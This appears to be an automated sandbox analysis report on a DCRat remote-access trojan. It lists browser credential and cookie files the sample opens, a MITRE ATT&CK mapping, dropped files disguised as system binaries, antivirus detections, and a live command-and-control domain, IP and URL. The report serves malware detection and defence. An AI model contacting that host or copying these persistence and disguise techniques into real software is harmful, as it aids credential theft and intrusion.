Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\COOPBL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\HARNGTON.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\INFROMAN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\LATINWD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\LFAXI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\OLDENGL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\ONYX.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\PARCHM.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\PERBI___.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\PERTILI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\POORICH.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\ROCK.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\ROCKI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\ROCKB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\ROCKEB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\ROCKBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\ROCC____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\SHOWG.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\TCMI____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\TCBI____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\TCCB____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\VINERITC.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000002.1813554604.000000001360B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 4si9noTBNw.exe PID: 7596, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: conhost.exe PID: 8420, type: MEMORYSTR
Source: Yara match | File source: 4si9noTBNw.exe, type: SAMPLE
Source: Yara match | File source: 0.0.4si9noTBNw.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1668520663.0000000000F62000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe, type: DROPPED
Source: Yara match | File source: C:\Users\Public\AccountPictures\winlogon.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\Windows Defender\en-GB\conhost.exe, type: DROPPED
Source: Yara match | File source: 4si9noTBNw.exe, type: SAMPLE
Source: Yara match | File source: 0.0.4si9noTBNw.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe, type: DROPPED
Source: Yara match | File source: C:\Users\Public\AccountPictures\winlogon.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\Windows Defender\en-GB\conhost.exe, type: DROPPED
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Remote Access Functionality

Source: Yara match | File source: 00000000.00000002.1813554604.000000001360B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 4si9noTBNw.exe PID: 7596, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: conhost.exe PID: 8420, type: MEMORYSTR
Source: Yara match | File source: 4si9noTBNw.exe, type: SAMPLE
Source: Yara match | File source: 0.0.4si9noTBNw.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1668520663.0000000000F62000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe, type: DROPPED
Source: Yara match | File source: C:\Users\Public\AccountPictures\winlogon.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\Windows Defender\en-GB\conhost.exe, type: DROPPED
Source: Yara match | File source: 4si9noTBNw.exe, type: SAMPLE
Source: Yara match | File source: 0.0.4si9noTBNw.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe, type: DROPPED
Source: Yara match | File source: C:\Users\Public\AccountPictures\winlogon.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\Windows Defender\en-GB\conhost.exe, type: DROPPED
MITRE ATT&CK Matrix (techniques listed per tactic; a leading number is the count shown beside that technique in the report)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 11 Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 Scripting; 1 DLL Side-Loading; 21 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 DLL Side-Loading; 11 Process Injection; 21 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading; 1 File Deletion; 33 Masquerading; 141 Virtualization/Sandbox Evasion; 11 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 File and Directory Discovery; 124 System Information Discovery; 211 Security Software Discovery; 1 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery; Network Sniffing
Lateral Movement: 1 Taint Shared Content; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 11 Archive Collected Data; 1 Data from Local System; 1 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Encrypted Channel; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet
Behavior Graph (ID: 1571653, Sample: 4si9noTBNw.exe, Startdate: 09/12/2024, Architecture: WINDOWS, Score: 100)

Start [node 2]
  DNS/IP: 306039cm.nyashcrack.top
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 17 other signatures
  Started: 4si9noTBNw.exe 11 32 [node 8]; 4si9noTBNw.exe [node 12]; winlogon.exe 2 [node 15]; 12 other processes [node 17]

4si9noTBNw.exe [node 8]
  Dropped: C:\Users\user\Desktop\nocldQFM.log (PE32); C:\Users\user\Desktop\hEXMkWTV.log (PE32); C:\Users\user\Desktop\exZDPEZZ.log (PE32); 12 other malicious files
  Signatures: Creates an undocumented autostart registry key; Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines); Creates multiple autostart registry keys; 2 other signatures
  Started: cmd.exe [node 19]; csc.exe 4 [node 22]; powershell.exe [node 25]; 5 other processes [node 27]

4si9noTBNw.exe [node 12]
  DNS/IP: 306039cm.nyashcrack.top 37.44.238.250, ports 49736, 49737, 49738, HARMONYHOSTING-ASFR France
  Dropped: C:\Users\user\Desktop\xWYkXXxo.log (PE32); C:\Users\user\Desktop\hMjNZkhU.log (PE32); C:\Users\user\Desktop\YdQxpHbm.log (PE32); C:\Users\user\Desktop\OuwhFfWF.log (PE32)
  Signatures: Tries to harvest and steal browser information (history, passwords, etc)

winlogon.exe [node 15]
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file

12 other processes [node 17]
  DNS/IP: 127.0.0.1 unknown unknown

cmd.exe [node 19]
  Signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
  Started: 4 other processes [node 43]

csc.exe [node 22]
  Dropped: C:\Windows\...\SecurityHealthSystray.exe (PE32)
  Signatures: Infects executable files (exe, dll, sys, html)
  Started: conhost.exe [node 29]; cvtres.exe 1 [node 31]

powershell.exe [node 25]
  Signatures: Loading BitLocker PowerShell Module
  Started: conhost.exe [node 33]; WmiPrvSE.exe [node 35]

5 other processes [node 27]
  Started: conhost.exe [node 37]; conhost.exe [node 39]; conhost.exe [node 41]; 2 other processes [node 45]

Source | Detection | Scanner | Label
4si9noTBNw.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
4si9noTBNw.exe | 100% | Avira | HEUR/AGEN.1323342
4si9noTBNw.exe | 100% | Joe Sandbox ML
Source | Detection | Scanner | Label
C:\Users\user\Desktop\JzShoUtR.log | 100% | Avira | TR/AVI.Agent.updqb
C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\Public\AccountPictures\winlogon.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\csCDqY6YZN.bat | 100% | Avira | BAT/Delbat.C
C:\Program Files\Windows Defender\en-GB\conhost.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe | 100% | Joe Sandbox ML
C:\Users\Public\AccountPictures\winlogon.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe | 100% | Joe Sandbox ML
C:\Users\user\Desktop\OuwhFfWF.log | 100% | Joe Sandbox ML
C:\Program Files\Windows Defender\en-GB\conhost.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Windows Defender\en-GB\conhost.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Recovery\VTixufCejPQZEvXiB.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\Public\AccountPictures\winlogon.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\JzShoUtR.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\OuwhFfWF.log | 8% | ReversingLabs
C:\Users\user\Desktop\YdQxpHbm.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\exZDPEZZ.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\hEXMkWTV.log | 8% | ReversingLabs
C:\Users\user\Desktop\hMjNZkhU.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\nocldQFM.log | 25% | ReversingLabs
C:\Users\user\Desktop\xWYkXXxo.log | 25% | ReversingLabs
                            No Antivirus matches
                            No Antivirus matches
Source | Detection | Scanner | Label
http://306039cm.nyashcrack.top/geoGeneratorwordpresswpprivatetempDownloads.php | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Reputation
306039cm.nyashcrack.top | 37.44.238.250 | true | true | unknown
Name | Malicious | Antivirus Detection | Reputation
http://306039cm.nyashcrack.top/geoGeneratorwordpresswpprivatetempDownloads.php | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Reputation
https://ac.ecosia.org/autocomplete?q= | 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.dr | false | high
https://g.live.com/odclientsettings/Prod.C: | svchost.exe, 00000037.00000003.2168596932.0000029C9D51A000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.dr | false | high
https://duckduckgo.com/chrome_newtab | 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.dr | false | high
https://duckduckgo.com/ac/?q= | 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.dr | false | high
https://g.live.com/odclientsettings/ProdV2 | svchost.exe, 00000037.00000003.2168596932.0000029C9D4C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.55.dr | false | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 6bRjdXvoM1.54.dr, q99Xyv2u0S.54.dr | false | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000020.00000002.1886143389.0000025B914DA000.00000004.00000800.00020000.00000000.sdmp | false | high
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | svchost.exe, 00000037.00000003.2168596932.0000029C9D4C2000.00000004.00000800.00020000.00000000.sdmp | false | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 0000001A.00000002.1893613908.00000218E546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1893900789.0000025223779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1886777738.000002809CC23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1885700932.00000240916D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1889302298.00000277B2069000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1886143389.0000025B914DA000.00000004.00000800.00020000.00000000.sdmp | false | high
